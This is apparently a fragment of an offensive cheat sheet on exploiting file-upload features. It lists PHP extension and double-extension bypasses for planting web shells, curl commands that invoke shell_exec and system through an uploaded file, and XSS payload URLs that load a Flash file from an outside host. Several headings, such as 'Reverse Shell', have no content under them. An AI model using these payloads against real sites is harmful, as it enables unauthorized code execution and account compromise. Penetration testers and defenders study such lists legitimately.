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Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
Exploits
Image Tragik
HTTP Request
Reverse Shell
Touch command
PHP Extension
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
PNG Bypass a resize - Upload the picture and use a local file inclusion
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
JPG Bypass a resize - Upload the picture and use a local file inclusion
http://localhost/test.php?c=ls
XSS via SWF
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
Examples:
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
Thanks to
- Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil